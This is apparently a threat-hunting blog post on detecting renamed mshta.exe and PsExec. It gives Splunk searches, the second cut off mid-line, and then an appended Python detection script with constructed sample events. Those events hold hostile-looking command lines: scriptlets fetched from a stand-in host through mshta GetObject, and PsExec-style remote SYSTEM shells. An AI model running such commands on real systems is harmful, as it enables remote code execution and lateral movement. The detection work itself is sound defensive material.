Threat hunting without file names

Having signatures for common techniques is great, but let's take it to the next level. Imagine the script-host executable is simply copied under a new name: will your detection still trigger? This is a good technique to keep in mind while creating searches. Take a look at the following Splunk search to detect mshta.exe with suspicious strings.

    index=edr mshta.exe getobject script (vbscript OR javascript) command_line!="" | table command_line process_path computer

Works great and lasts a long time, right? But a central match is the mshta.exe string. Here is another version which drops the mshta.exe term and negates mshta instead, to catch just those events where the file has been renamed. In my view these are a higher severity and I want to see them separately. (Keeping mshta.exe as a positive term next to NOT mshta would match nothing, since every event that contains mshta.exe also contains the token mshta.)

    index=edr getobject script (vbscript OR javascript) NOT mshta command_line!="" | table command_line process_path computer

Here is another example to find the -accepteula string from Sysinternals PsExec.

    index=edr -acce...
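The same idea, filename-agnostic matching on command-line content with the binary name used only to decide severity, as an added example run over constructed process events. This is not code from the original post; the events, field names and rule definitions are assumptions chosen to mirror the table fields above (command_line, process_path, computer), and the substring matching is a stand-in for Splunk's token search.

```python
"""Filename-agnostic hunting over EDR process-creation events.

Added example (not from the original post). Rules match only on the
command line, so a renamed copy of mshta.exe or PsExec.exe still triggers;
the image name is then compared with what the tool is normally called,
and a mismatch is reported as the higher-severity "renamed" case.
"""
import ntpath

# Constructed sample events; paths and command lines are illustrative,
# not captured telemetry.
EVENTS = [
    {"computer": "WS01", "process_path": r"C:\Windows\System32\mshta.exe",
     "command_line": 'mshta.exe vbscript:GetObject("script:http://example.invalid/a.sct")'},
    {"computer": "WS02", "process_path": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
     "command_line": 'svchost.exe javascript:GetObject("script:http://example.invalid/b.sct")'},
    {"computer": "WS03", "process_path": r"C:\Tools\PsExec.exe",
     "command_line": r"PsExec.exe -accepteula \\srv01 -s cmd.exe"},
    {"computer": "WS04", "process_path": r"C:\ProgramData\update.exe",
     "command_line": r"update.exe -accepteula \\srv02 -s cmd.exe"},
    {"computer": "WS05", "process_path": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c dir"},
]

# Rule shape (assumed): every term in all_of must appear, at least one term
# in any_of must appear (if any_of is non-empty), and expected_images lists
# the names the tool normally runs under. Note the image name is NOT a
# match condition, which is the whole point of the post.
RULES = [
    {"name": "mshta scriptlet execution",
     "expected_images": ("mshta.exe",),
     "all_of": ("getobject", "script"),
     "any_of": ("vbscript", "javascript")},
    {"name": "psexec -accepteula",
     "expected_images": ("psexec.exe", "psexec64.exe"),
     "all_of": ("-accepteula",),
     "any_of": ()},
]


def matches(rule, command_line):
    """Case-insensitive substring match, standing in for Splunk term search."""
    cl = command_line.lower()
    if not cl:                      # mirrors command_line!=""
        return False
    if not all(term in cl for term in rule["all_of"]):
        return False
    return not rule["any_of"] or any(term in cl for term in rule["any_of"])


def image_name(process_path):
    """Basename of a Windows path, lower-cased for comparison."""
    return ntpath.basename(process_path).lower()


def hunt(events, rules=RULES):
    """Return one hit per (event, rule) match, flagging renamed binaries."""
    hits = []
    for ev in events:
        for rule in rules:
            if not matches(rule, ev["command_line"]):
                continue
            renamed = image_name(ev["process_path"]) not in rule["expected_images"]
            hits.append({
                "computer": ev["computer"],
                "rule": rule["name"],
                "process_path": ev["process_path"],
                "command_line": ev["command_line"],
                "renamed": renamed,
                # Renamed copies are the higher-severity case the post wants
                # to see separately, equivalent to its "NOT mshta" search.
                "severity": "high" if renamed else "medium",
            })
    return hits


def renamed_only(hits):
    """The 'NOT mshta' view: only hits where the binary was renamed."""
    return [h for h in hits if h["renamed"]]


if __name__ == "__main__":
    for h in hunt(EVENTS):
        print(f'{h["severity"]:6} {h["computer"]} {h["rule"]}: '
              f'{h["process_path"]}')
```

Running it reports WS01 and WS03 as medium (the tools under their usual names) and WS02 and WS04 as high (the same command lines under svchost.exe and update.exe), while the benign cmd.exe event on WS05 produces nothing. The caveat carries over from the Splunk version: a very short term like "script" is a substring of "vbscript", so in production you would tighten the terms or match on tokens rather than raw substrings.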